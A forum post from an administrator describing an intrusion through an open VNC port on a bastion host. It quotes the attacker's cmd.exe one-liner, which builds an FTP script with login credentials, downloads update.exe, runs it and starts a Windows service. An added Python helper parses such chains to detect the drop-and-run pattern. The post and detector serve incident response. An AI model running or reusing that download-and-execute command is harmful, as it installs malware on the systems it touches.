I've got a bastion host that had VNC wide open. I just got a connection. It fired a Ctrl-Alt-Del, opened a task manager, and ran cmd.exe. It then executed the following command. I was able to get a screenshot before the window disappeared, but it looked like the command was not successful. The attacker disconnected immediately. I have no extra users, but am downloading Helix right now to see if anything really happened. I also have a pcap. But does this look familiar to anyone?
cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit
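As an added triage helper (not part of the original post), the following Python splits a captured cmd.exe one-liner on `&`, rebuilds the FTP script that the `echo ... >> file` segments write, and flags the "script-driven ftp download, then run the downloaded file" pattern. `SAMPLE_CMDLINE` is the command from the post; the function and field names are my own.

```python
import re
from typing import Dict, List

# Constructed sample: the command line captured in the post above.
SAMPLE_CMDLINE = (
    "cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij "
    "&echo binary >> ij &echo get update.exe >> ij &echo bye >> ij "
    "&ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit"
)

ECHO_APPEND_RE = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.I)
FTP_SCRIPT_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)


def split_cmd_chain(cmdline: str) -> List[str]:
    """Drop a leading 'cmd /c' and split the chain on '&' into trimmed segments."""
    body = re.sub(r"^cmd(\.exe)?\s+/c\s+", "", cmdline.strip(), flags=re.I)
    return [s.strip() for s in body.split("&") if s.strip()]


def reconstruct_scripts(cmdline: str) -> Dict[str, List[str]]:
    """Rebuild each file the chain builds with 'echo ... >> file' (the ftp script)."""
    files: Dict[str, List[str]] = {}
    for seg in split_cmd_chain(cmdline):
        m = ECHO_APPEND_RE.match(seg)
        if m:
            files.setdefault(m.group(2), []).append(m.group(1))
    return files


def analyze(cmdline: str) -> dict:
    """Summarise what the chain does; 'is_ftp_drop_and_run' is the detection verdict."""
    segs = split_cmd_chain(cmdline)
    scripts = reconstruct_scripts(cmdline)
    out = {"script_files": [], "ftp_user": None, "downloaded": [], "executed": []}
    for seg in segs:
        m = FTP_SCRIPT_RE.match(seg)
        if not m:
            continue
        out["script_files"].append(m.group(1))
        for line in scripts.get(m.group(1), []):  # walk the reconstructed ftp script
            parts = line.split()
            if parts[0].lower() == "get" and len(parts) > 1:
                out["downloaded"].append(parts[1])
            elif parts[0].lower() == "user" and len(parts) > 1:
                out["ftp_user"] = parts[1]
    # A later segment that runs a name fetched by 'get' is the payload launch.
    out["executed"] = [s for s in segs if s.split()[0] in out["downloaded"]]
    out["is_ftp_drop_and_run"] = bool(out["script_files"] and out["executed"])
    return out
```

Note that `net set 21 >> ij` is not an `echo`, so it is left out of the rebuilt script; only the four `echo` lines (user, binary, get, bye) are recovered.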